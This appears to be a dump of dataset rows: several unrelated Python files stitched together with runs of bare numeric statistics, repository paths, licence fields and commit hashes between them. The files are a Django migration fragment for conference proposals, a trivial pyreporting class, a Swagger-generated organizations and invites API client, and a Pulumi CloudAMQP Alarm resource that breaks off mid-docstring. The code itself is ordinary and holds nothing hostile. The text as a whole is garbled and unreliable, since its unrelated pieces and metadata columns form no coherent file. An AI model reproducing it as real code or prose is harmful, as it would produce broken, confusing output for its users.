            model_name="proposal",
            name="proposal_section",
            field=models.ForeignKey(
                verbose_name="Proposal Section",
                to="proposals.ProposalSection",
                on_delete=models.deletion.CASCADE,
            ),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name="proposal",
            name="proposal_type",
            field=models.ForeignKey(
                verbose_name="Proposal Type",
                to="proposals.ProposalType",
                on_delete=models.deletion.CASCADE,
            ),
            preserve_default=True,
        ),
        migrations.AlterUniqueTogether(
            name="proposal", unique_together=set([("conference", "slug")]),
        ),
        migrations.AddField(
            model_name="conferenceproposaltype",
            name="proposal_type",
            field=models.ForeignKey(
                verbose_name="Proposal Type",
                to="proposals.ProposalType",
                on_delete=models.deletion.CASCADE,
            ),
            preserve_default=True,
        ),
        migrations.AlterUniqueTogether(
            name="conferenceproposaltype",
            unique_together=set([("conference", "proposal_type")]),
        ),
        migrations.AddField(
            model_name="conferenceproposalsection",
            name="proposal_section",
            field=models.ForeignKey(
                verbose_name="Proposal Section",
                to="proposals.ProposalSection",
                on_delete=models.deletion.CASCADE,
            ),
            preserve_default=True,
        ),
        migrations.AlterUniqueTogether(
            name="conferenceproposalsection",
            unique_together=set([("conference", "proposal_section")]),
        ),
    ]
| 35.620301
| 88
| 0.380422
| 1,144
| 18,950
| 6.104021
| 0.118881
| 0.075612
| 0.044107
| 0.069311
| 0.781612
| 0.766003
| 0.751683
| 0.712015
| 0.712015
| 0.686954
| 0
| 0.003812
| 0.529288
| 18,950
| 531
| 89
| 35.687382
| 0.779036
| 0.001108
| 0
| 0.752381
| 0
| 0
| 0.113277
| 0.030116
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007619
| 0
| 0.013333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4dd011e1b2b363e6e0b13074ce3ca1a76e154c7f
| 89
|
py
|
Python
|
pyreporting/reports/report_table_explorer_item.py
|
LeGITimate2020/reporting
|
c616a6763fd9fa5c1e288c61d551f585ec5cc463
|
[
"MIT"
] | 3
|
2018-08-03T17:43:07.000Z
|
2018-08-06T18:27:53.000Z
|
pyreporting/reports/report_table_explorer_item.py
|
LeGITimate2020/reporting
|
c616a6763fd9fa5c1e288c61d551f585ec5cc463
|
[
"MIT"
] | null | null | null |
pyreporting/reports/report_table_explorer_item.py
|
LeGITimate2020/reporting
|
c616a6763fd9fa5c1e288c61d551f585ec5cc463
|
[
"MIT"
] | 1
|
2018-08-11T17:50:32.000Z
|
2018-08-11T17:50:32.000Z
|
from . import ReportTableItem
class ReportTableExplorerItem(ReportTableItem):
    """Report-table item variant for "explorer" tables.

    Adds no behavior of its own — it is a marker subclass of
    ``ReportTableItem`` (presumably so explorer-style table items can be
    distinguished by type elsewhere; confirm against callers).
    """
    pass
| 14.833333
| 47
| 0.808989
| 7
| 89
| 10.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.146067
| 89
| 5
| 48
| 17.8
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
12a73698c324a3476301da21c8703b77f7ff4ed0
| 33,489
|
py
|
Python
|
ce_api/api/organizations_api.py
|
maiot-io/cengine
|
3a1946c449e8c5e1d216215df6eeab941eb1640a
|
[
"Apache-2.0"
] | 7
|
2020-10-13T12:47:32.000Z
|
2021-03-12T12:00:14.000Z
|
ce_api/api/organizations_api.py
|
maiot-io/cengine
|
3a1946c449e8c5e1d216215df6eeab941eb1640a
|
[
"Apache-2.0"
] | null | null | null |
ce_api/api/organizations_api.py
|
maiot-io/cengine
|
3a1946c449e8c5e1d216215df6eeab941eb1640a
|
[
"Apache-2.0"
] | 1
|
2021-01-23T02:19:42.000Z
|
2021-01-23T02:19:42.000Z
|
# coding: utf-8
"""
maiot Core Engine API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ce_api.api_client import ApiClient
class OrganizationsApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen

    Every endpoint below is exposed as a pair of methods:

    * ``<name>(...)`` — returns only the deserialized response data.
    * ``<name>_with_http_info(...)`` — same call, but without forcing
      ``_return_http_data_only``.

    All endpoints are synchronous by default; pass ``async_req=True`` to
    receive the request thread instead (call ``thread.get()`` for the
    result).
    """

    # Transport/control kwargs accepted by every endpoint in addition to
    # the endpoint's own parameters.
    _TRANSPORT_OPTIONS = ('async_req', '_return_http_data_only',
                          '_preload_content', '_request_timeout')

    def __init__(self, api_client=None):
        """Wrap *api_client*; build a default ``ApiClient`` when none is given."""
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def _call_endpoint(self, method_name, resource_path, http_method,
                       response_type, params, kwargs, required=(),
                       body_key=None, path_keys=(), query_keys=(),
                       set_content_type=False,
                       auth_settings=('OAuth2PasswordBearer',)):
        """Shared request plumbing for every endpoint of this API.

        Validates ``kwargs`` against the endpoint's accepted parameter
        names, enforces required parameters, assembles path/query/header/
        body parameters and dispatches via ``ApiClient.call_api``.

        :param str method_name: public endpoint name (used in error messages).
        :param str resource_path: URL template, e.g. ``'/api/v1/organizations/'``.
        :param str http_method: ``'GET'`` / ``'POST'`` / ``'DELETE'``.
        :param str response_type: swagger response type name.
        :param dict params: the endpoint's named arguments, keyed by name.
        :param dict kwargs: caller-supplied keyword arguments.
        :param tuple required: parameter names that must be present and non-None.
        :param body_key: name of the parameter sent as the request body, if any.
        :param tuple path_keys: parameter names substituted into *resource_path*.
        :param tuple query_keys: optional query-string parameter names.
        :param bool set_content_type: send a JSON ``Content-Type`` header
            (only the body-carrying POST endpoints do).
        :param auth_settings: authentication settings for this endpoint.
        :return: whatever ``ApiClient.call_api`` returns (data tuple or thread).
        :raises TypeError: on an unexpected keyword argument.
        :raises ValueError: on a missing/None required parameter.
        """
        all_params = (list(required) + list(query_keys) +
                      list(self._TRANSPORT_OPTIONS))
        for key, val in kwargs.items():
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method %s" % (key, method_name))
            params[key] = val
        # verify the required parameters are set
        for name in required:
            if name not in params or params[name] is None:
                raise ValueError(
                    "Missing the required parameter `%s` when calling `%s`"
                    % (name, method_name))

        collection_formats = {}
        path_params = {}
        for name in path_keys:
            if name in params:
                path_params[name] = params[name]
        query_params = [(name, params[name])
                        for name in query_keys if name in params]
        body_params = params.get(body_key) if body_key is not None else None

        # HTTP header `Accept` (all endpoints speak JSON)
        header_params = {
            'Accept': self.api_client.select_header_accept(
                ['application/json']),
        }
        # HTTP header `Content-Type`
        if set_content_type:
            header_params['Content-Type'] = (
                self.api_client.select_header_content_type(
                    ['application/json']))

        return self.api_client.call_api(
            resource_path, http_method,
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=[],
            files={},
            response_type=response_type,
            auth_settings=list(auth_settings),
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def create_invite_api_v1_organizations_invite_post(self, body, **kwargs):  # noqa: E501
        """Create Invite  # noqa: E501

        Invites user with specified email to organization via email.

        >>> thread = api.create_invite_api_v1_organizations_invite_post(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param InviteCreate body: (required)
        :return: Invite
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.create_invite_api_v1_organizations_invite_post_with_http_info(body, **kwargs)  # noqa: E501

    def create_invite_api_v1_organizations_invite_post_with_http_info(self, body, **kwargs):  # noqa: E501
        """Create Invite — full-response variant.

        Same parameters as ``create_invite_api_v1_organizations_invite_post``.
        """
        return self._call_endpoint(
            'create_invite_api_v1_organizations_invite_post',
            '/api/v1/organizations/invite', 'POST', 'Invite',
            {'body': body}, kwargs,
            required=('body',), body_key='body', set_content_type=True)

    def create_organization_api_v1_organizations_post(self, body, **kwargs):  # noqa: E501
        """Create Organization  # noqa: E501

        Create new organization. Only for admins. Users create orgs via sign up.

        >>> thread = api.create_organization_api_v1_organizations_post(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param OrgIn body: (required)
        :return: Organization
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.create_organization_api_v1_organizations_post_with_http_info(body, **kwargs)  # noqa: E501

    def create_organization_api_v1_organizations_post_with_http_info(self, body, **kwargs):  # noqa: E501
        """Create Organization — full-response variant.

        Same parameters as ``create_organization_api_v1_organizations_post``.
        """
        return self._call_endpoint(
            'create_organization_api_v1_organizations_post',
            '/api/v1/organizations/', 'POST', 'Organization',
            {'body': body}, kwargs,
            required=('body',), body_key='body', set_content_type=True)

    def delete_invite_api_v1_organizations_invite_invite_id_delete(self, invite_id, **kwargs):  # noqa: E501
        """Delete Invite  # noqa: E501

        Deletes the invite specified by ID.

        >>> thread = api.delete_invite_api_v1_organizations_invite_invite_id_delete(invite_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str invite_id: (required)
        :return: bool
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.delete_invite_api_v1_organizations_invite_invite_id_delete_with_http_info(invite_id, **kwargs)  # noqa: E501

    def delete_invite_api_v1_organizations_invite_invite_id_delete_with_http_info(self, invite_id, **kwargs):  # noqa: E501
        """Delete Invite — full-response variant.

        Same parameters as
        ``delete_invite_api_v1_organizations_invite_invite_id_delete``.
        """
        return self._call_endpoint(
            'delete_invite_api_v1_organizations_invite_invite_id_delete',
            '/api/v1/organizations/invite/{invite_id}', 'DELETE', 'bool',
            {'invite_id': invite_id}, kwargs,
            required=('invite_id',), path_keys=('invite_id',))

    def get_invite_by_code_api_v1_organizations_invite_code_get(self, code, **kwargs):  # noqa: E501
        """Get Invite By Code  # noqa: E501

        Gets specific invite. Note: this endpoint uses no authentication.

        >>> thread = api.get_invite_by_code_api_v1_organizations_invite_code_get(code, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str code: (required)
        :return: Invite
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.get_invite_by_code_api_v1_organizations_invite_code_get_with_http_info(code, **kwargs)  # noqa: E501

    def get_invite_by_code_api_v1_organizations_invite_code_get_with_http_info(self, code, **kwargs):  # noqa: E501
        """Get Invite By Code — full-response variant.

        Same parameters as
        ``get_invite_by_code_api_v1_organizations_invite_code_get``.
        """
        return self._call_endpoint(
            'get_invite_by_code_api_v1_organizations_invite_code_get',
            '/api/v1/organizations/invite/{code}', 'GET', 'Invite',
            {'code': code}, kwargs,
            required=('code',), path_keys=('code',), auth_settings=())

    def get_invites_api_v1_organizations_invite_get(self, **kwargs):  # noqa: E501
        """Get Invites  # noqa: E501

        Gets all invites of this users organization.

        >>> thread = api.get_invites_api_v1_organizations_invite_get(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str status: optional filter sent as a query parameter
        :return: list[Invite]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.get_invites_api_v1_organizations_invite_get_with_http_info(**kwargs)  # noqa: E501

    def get_invites_api_v1_organizations_invite_get_with_http_info(self, **kwargs):  # noqa: E501
        """Get Invites — full-response variant.

        Same parameters as ``get_invites_api_v1_organizations_invite_get``.
        """
        return self._call_endpoint(
            'get_invites_api_v1_organizations_invite_get',
            '/api/v1/organizations/invite', 'GET', 'list[Invite]',
            {}, kwargs, query_keys=('status',))

    def get_loggedin_organization_api_v1_organizations_get(self, **kwargs):  # noqa: E501
        """Get Loggedin Organization  # noqa: E501

        Gets the logged in users organization details.

        >>> thread = api.get_loggedin_organization_api_v1_organizations_get(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: Organization
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.get_loggedin_organization_api_v1_organizations_get_with_http_info(**kwargs)  # noqa: E501

    def get_loggedin_organization_api_v1_organizations_get_with_http_info(self, **kwargs):  # noqa: E501
        """Get Loggedin Organization — full-response variant.

        Same parameters as
        ``get_loggedin_organization_api_v1_organizations_get``.
        """
        return self._call_endpoint(
            'get_loggedin_organization_api_v1_organizations_get',
            '/api/v1/organizations/', 'GET', 'Organization', {}, kwargs)

    def get_org_creator_api_v1_organizations_creator_get(self, **kwargs):  # noqa: E501
        """Get Org Creator  # noqa: E501

        Returns a ``User`` for the organization's creator endpoint.

        >>> thread = api.get_org_creator_api_v1_organizations_creator_get(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: User
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.get_org_creator_api_v1_organizations_creator_get_with_http_info(**kwargs)  # noqa: E501

    def get_org_creator_api_v1_organizations_creator_get_with_http_info(self, **kwargs):  # noqa: E501
        """Get Org Creator — full-response variant.

        Same parameters as ``get_org_creator_api_v1_organizations_creator_get``.
        """
        return self._call_endpoint(
            'get_org_creator_api_v1_organizations_creator_get',
            '/api/v1/organizations/creator', 'GET', 'User', {}, kwargs)

    def get_org_users_api_v1_organizations_users_get(self, **kwargs):  # noqa: E501
        """Get Org Users  # noqa: E501

        Gets a list of all users in an organization.

        >>> thread = api.get_org_users_api_v1_organizations_users_get(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: list[UserInOrganization]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.get_org_users_api_v1_organizations_users_get_with_http_info(**kwargs)  # noqa: E501

    def get_org_users_api_v1_organizations_users_get_with_http_info(self, **kwargs):  # noqa: E501
        """Get Org Users — full-response variant.

        Same parameters as ``get_org_users_api_v1_organizations_users_get``.
        """
        return self._call_endpoint(
            'get_org_users_api_v1_organizations_users_get',
            '/api/v1/organizations/users', 'GET',
            'list[UserInOrganization]', {}, kwargs)

    def get_roles_in_org_api_v1_organizations_roles_get(self, **kwargs):  # noqa: E501
        """Get Roles In Org  # noqa: E501

        Note: this endpoint uses no authentication.

        >>> thread = api.get_roles_in_org_api_v1_organizations_roles_get(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: list[str]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        return self.get_roles_in_org_api_v1_organizations_roles_get_with_http_info(**kwargs)  # noqa: E501

    def get_roles_in_org_api_v1_organizations_roles_get_with_http_info(self, **kwargs):  # noqa: E501
        """Get Roles In Org — full-response variant.

        Same parameters as ``get_roles_in_org_api_v1_organizations_roles_get``.
        """
        return self._call_endpoint(
            'get_roles_in_org_api_v1_organizations_roles_get',
            '/api/v1/organizations/roles', 'GET', 'list[str]',
            {}, kwargs, auth_settings=())
| 38.98603
| 162
| 0.623936
| 3,892
| 33,489
| 5.043422
| 0.045992
| 0.048092
| 0.069693
| 0.033012
| 0.965663
| 0.960925
| 0.956748
| 0.93693
| 0.922971
| 0.911305
| 0
| 0.018805
| 0.291797
| 33,489
| 858
| 163
| 39.031469
| 0.808829
| 0.313566
| 0
| 0.79476
| 1
| 0
| 0.176382
| 0.071816
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041485
| false
| 0.015284
| 0.008734
| 0
| 0.111354
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12ac0d4607110dc4ee2bf185eaf5c98c95999b44
| 26,459
|
py
|
Python
|
sdk/python/pulumi_cloudamqp/alarm.py
|
pulumi/pulumi-cloudamqp
|
1d411fb0076c257b51a6b133aaedb9292efa2373
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-09-23T11:53:33.000Z
|
2021-12-01T20:56:35.000Z
|
sdk/python/pulumi_cloudamqp/alarm.py
|
pulumi/pulumi-cloudamqp
|
1d411fb0076c257b51a6b133aaedb9292efa2373
|
[
"ECL-2.0",
"Apache-2.0"
] | 53
|
2019-12-09T20:12:27.000Z
|
2022-03-31T15:21:00.000Z
|
sdk/python/pulumi_cloudamqp/alarm.py
|
pulumi/pulumi-cloudamqp
|
1d411fb0076c257b51a6b133aaedb9292efa2373
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-12-11T09:29:16.000Z
|
2019-12-11T09:29:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['AlarmArgs', 'Alarm']
@pulumi.input_type
class AlarmArgs:
    def __init__(__self__, *,
                 enabled: pulumi.Input[bool],
                 instance_id: pulumi.Input[int],
                 recipients: pulumi.Input[Sequence[pulumi.Input[int]]],
                 type: pulumi.Input[str],
                 message_type: Optional[pulumi.Input[str]] = None,
                 queue_regex: Optional[pulumi.Input[str]] = None,
                 time_threshold: Optional[pulumi.Input[int]] = None,
                 value_threshold: Optional[pulumi.Input[int]] = None,
                 vhost_regex: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing an Alarm resource.
        :param pulumi.Input[bool] enabled: Enable or disable the alarm to trigger.
        :param pulumi.Input[int] instance_id: The CloudAMQP instance ID.
        :param pulumi.Input[Sequence[pulumi.Input[int]]] recipients: Identifier for recipient to be notified. Leave empty to notify all recipients.
        :param pulumi.Input[str] type: The alarm type, see valid options below.
        :param pulumi.Input[str] message_type: Message type `(total, unacked, ready)` used by queue alarm type.
        :param pulumi.Input[str] queue_regex: Regex for which queue to check.
        :param pulumi.Input[int] time_threshold: The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
        :param pulumi.Input[int] value_threshold: The value to trigger the alarm for.
        :param pulumi.Input[str] vhost_regex: Regex for which vhost to check
        """
        # Required arguments are always recorded.
        pulumi.set(__self__, "enabled", enabled)
        pulumi.set(__self__, "instance_id", instance_id)
        pulumi.set(__self__, "recipients", recipients)
        pulumi.set(__self__, "type", type)
        # Optional arguments are recorded only when explicitly provided,
        # matching the generated per-argument `is not None` checks.
        for name, value in (("message_type", message_type),
                            ("queue_regex", queue_regex),
                            ("time_threshold", time_threshold),
                            ("value_threshold", value_threshold),
                            ("vhost_regex", vhost_regex)):
            if value is not None:
                pulumi.set(__self__, name, value)

    @property
    @pulumi.getter
    def enabled(self) -> pulumi.Input[bool]:
        """
        Enable or disable the alarm to trigger.
        """
        return pulumi.get(self, "enabled")

    @enabled.setter
    def enabled(self, value: pulumi.Input[bool]):
        pulumi.set(self, "enabled", value)

    @property
    @pulumi.getter(name="instanceId")
    def instance_id(self) -> pulumi.Input[int]:
        """
        The CloudAMQP instance ID.
        """
        return pulumi.get(self, "instance_id")

    @instance_id.setter
    def instance_id(self, value: pulumi.Input[int]):
        pulumi.set(self, "instance_id", value)

    @property
    @pulumi.getter
    def recipients(self) -> pulumi.Input[Sequence[pulumi.Input[int]]]:
        """
        Identifier for recipient to be notified. Leave empty to notify all recipients.
        """
        return pulumi.get(self, "recipients")

    @recipients.setter
    def recipients(self, value: pulumi.Input[Sequence[pulumi.Input[int]]]):
        pulumi.set(self, "recipients", value)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        """
        The alarm type, see valid options below.
        """
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter(name="messageType")
    def message_type(self) -> Optional[pulumi.Input[str]]:
        """
        Message type `(total, unacked, ready)` used by queue alarm type.
        """
        return pulumi.get(self, "message_type")

    @message_type.setter
    def message_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "message_type", value)

    @property
    @pulumi.getter(name="queueRegex")
    def queue_regex(self) -> Optional[pulumi.Input[str]]:
        """
        Regex for which queue to check.
        """
        return pulumi.get(self, "queue_regex")

    @queue_regex.setter
    def queue_regex(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "queue_regex", value)

    @property
    @pulumi.getter(name="timeThreshold")
    def time_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
        """
        return pulumi.get(self, "time_threshold")

    @time_threshold.setter
    def time_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "time_threshold", value)

    @property
    @pulumi.getter(name="valueThreshold")
    def value_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        The value to trigger the alarm for.
        """
        return pulumi.get(self, "value_threshold")

    @value_threshold.setter
    def value_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "value_threshold", value)

    @property
    @pulumi.getter(name="vhostRegex")
    def vhost_regex(self) -> Optional[pulumi.Input[str]]:
        """
        Regex for which vhost to check
        """
        return pulumi.get(self, "vhost_regex")

    @vhost_regex.setter
    def vhost_regex(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vhost_regex", value)
@pulumi.input_type
class _AlarmState:
    """Pulumi input-state container backing ``Alarm`` lookups.

    Every field is optional because a state object may partially describe an
    existing resource (see ``Alarm.get``).  Values are stored and retrieved
    through ``pulumi.set``/``pulumi.get`` as required by ``@pulumi.input_type``.
    """
    def __init__(__self__, *,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 instance_id: Optional[pulumi.Input[int]] = None,
                 message_type: Optional[pulumi.Input[str]] = None,
                 queue_regex: Optional[pulumi.Input[str]] = None,
                 recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
                 time_threshold: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 value_threshold: Optional[pulumi.Input[int]] = None,
                 vhost_regex: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Alarm resources.
        :param pulumi.Input[bool] enabled: Enable or disable the alarm to trigger.
        :param pulumi.Input[int] instance_id: The CloudAMQP instance ID.
        :param pulumi.Input[str] message_type: Message type `(total, unacked, ready)` used by queue alarm type.
        :param pulumi.Input[str] queue_regex: Regex for which queue to check.
        :param pulumi.Input[Sequence[pulumi.Input[int]]] recipients: Identifier for recipient to be notified. Leave empty to notify all recipients.
        :param pulumi.Input[int] time_threshold: The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
        :param pulumi.Input[str] type: The alarm type, see valid options below.
        :param pulumi.Input[int] value_threshold: The value to trigger the alarm for.
        :param pulumi.Input[str] vhost_regex: Regex for which vhost to check.
        """
        # Only store fields that were explicitly provided; absent fields stay
        # unset so they do not participate in filtering.
        if enabled is not None:
            pulumi.set(__self__, "enabled", enabled)
        if instance_id is not None:
            pulumi.set(__self__, "instance_id", instance_id)
        if message_type is not None:
            pulumi.set(__self__, "message_type", message_type)
        if queue_regex is not None:
            pulumi.set(__self__, "queue_regex", queue_regex)
        if recipients is not None:
            pulumi.set(__self__, "recipients", recipients)
        if time_threshold is not None:
            pulumi.set(__self__, "time_threshold", time_threshold)
        if type is not None:
            pulumi.set(__self__, "type", type)
        if value_threshold is not None:
            pulumi.set(__self__, "value_threshold", value_threshold)
        if vhost_regex is not None:
            pulumi.set(__self__, "vhost_regex", vhost_regex)

    # Generated accessor pairs: read/write the stored field via pulumi.get/set.
    @property
    @pulumi.getter
    def enabled(self) -> Optional[pulumi.Input[bool]]:
        """
        Enable or disable the alarm to trigger.
        """
        return pulumi.get(self, "enabled")
    @enabled.setter
    def enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "enabled", value)
    @property
    @pulumi.getter(name="instanceId")
    def instance_id(self) -> Optional[pulumi.Input[int]]:
        """
        The CloudAMQP instance ID.
        """
        return pulumi.get(self, "instance_id")
    @instance_id.setter
    def instance_id(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "instance_id", value)
    @property
    @pulumi.getter(name="messageType")
    def message_type(self) -> Optional[pulumi.Input[str]]:
        """
        Message type `(total, unacked, ready)` used by queue alarm type.
        """
        return pulumi.get(self, "message_type")
    @message_type.setter
    def message_type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "message_type", value)
    @property
    @pulumi.getter(name="queueRegex")
    def queue_regex(self) -> Optional[pulumi.Input[str]]:
        """
        Regex for which queue to check.
        """
        return pulumi.get(self, "queue_regex")
    @queue_regex.setter
    def queue_regex(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "queue_regex", value)
    @property
    @pulumi.getter
    def recipients(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]:
        """
        Identifier for recipient to be notified. Leave empty to notify all recipients.
        """
        return pulumi.get(self, "recipients")
    @recipients.setter
    def recipients(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]]):
        pulumi.set(self, "recipients", value)
    @property
    @pulumi.getter(name="timeThreshold")
    def time_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
        """
        return pulumi.get(self, "time_threshold")
    @time_threshold.setter
    def time_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "time_threshold", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """
        The alarm type, see valid options below.
        """
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
    @property
    @pulumi.getter(name="valueThreshold")
    def value_threshold(self) -> Optional[pulumi.Input[int]]:
        """
        The value to trigger the alarm for.
        """
        return pulumi.get(self, "value_threshold")
    @value_threshold.setter
    def value_threshold(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "value_threshold", value)
    @property
    @pulumi.getter(name="vhostRegex")
    def vhost_regex(self) -> Optional[pulumi.Input[str]]:
        """
        Regex for which vhost to check.
        """
        return pulumi.get(self, "vhost_regex")
    @vhost_regex.setter
    def vhost_regex(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vhost_regex", value)
class Alarm(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 enabled: Optional[pulumi.Input[bool]] = None,
                 instance_id: Optional[pulumi.Input[int]] = None,
                 message_type: Optional[pulumi.Input[str]] = None,
                 queue_regex: Optional[pulumi.Input[str]] = None,
                 recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
                 time_threshold: Optional[pulumi.Input[int]] = None,
                 type: Optional[pulumi.Input[str]] = None,
                 value_threshold: Optional[pulumi.Input[int]] = None,
                 vhost_regex: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        This resource allows you to create and manage alarms to trigger based on a set of conditions. Once triggered a notification will be sent to the assigned recipients. When creating a new instance, there will also be a set of default alarms (cpu, memory and disk) created. All default alarms use the default recipient for notifications.
        By setting `no_default_alarms` to *true* in `Instance`, the instance is created without default alarms, avoiding the need to import them to get full control.
        Available for all subscription plans, but `lemur` and `tiger` are limited to fewer alarm types. The limited types supported can be seen in the table below in Alarm Type Reference.
        ## Alarm Type reference
        Valid options for notification type.
        Required arguments for all alarms: *instance_id*, *type* and *enabled*
        Optional argument for all alarms: *tags*, *queue_regex*, *vhost_regex*
        | Name | Type | Shared | Dedicated | Required arguments |
        | ---- | ---- | ---- | ---- | ---- |
        | CPU | cpu | - | ✔ | time_threshold, value_threshold |
        | Memory | memory | - | ✔ | time_threshold, value_threshold |
        | Disk space | disk | - | ✔ | time_threshold, value_threshold |
        | Queue | queue | ✔ | ✔ | time_threshold, value_threshold, queue_regex, vhost_regex, message_type |
        | Connection | connection | ✔ | ✔ | time_threshold, value_threshold |
        | Consumer | consumer | ✔ | ✔ | time_threshold, value_threshold, queue, vhost |
        | Netsplit | netsplit | - | ✔ | time_threshold |
        | Server unreachable | server_unreachable | - | ✔ | time_threshold |
        | Notice | notice | ✔ | ✔ | |
        ## Dependency
        This resource depends on CloudAMQP instance identifier, `cloudamqp_instance.instance.id`.
        ## Import
        `cloudamqp_alarm` can be imported using CloudAMQP internal identifier of the alarm together (CSV separated) with the instance identifier. To retrieve the alarm identifier, use [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html#list-alarms)
        ```sh
        $ pulumi import cloudamqp:index/alarm:Alarm alarm <id>,<instance_id>
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] enabled: Enable or disable the alarm to trigger.
        :param pulumi.Input[int] instance_id: The CloudAMQP instance ID.
        :param pulumi.Input[str] message_type: Message type `(total, unacked, ready)` used by queue alarm type.
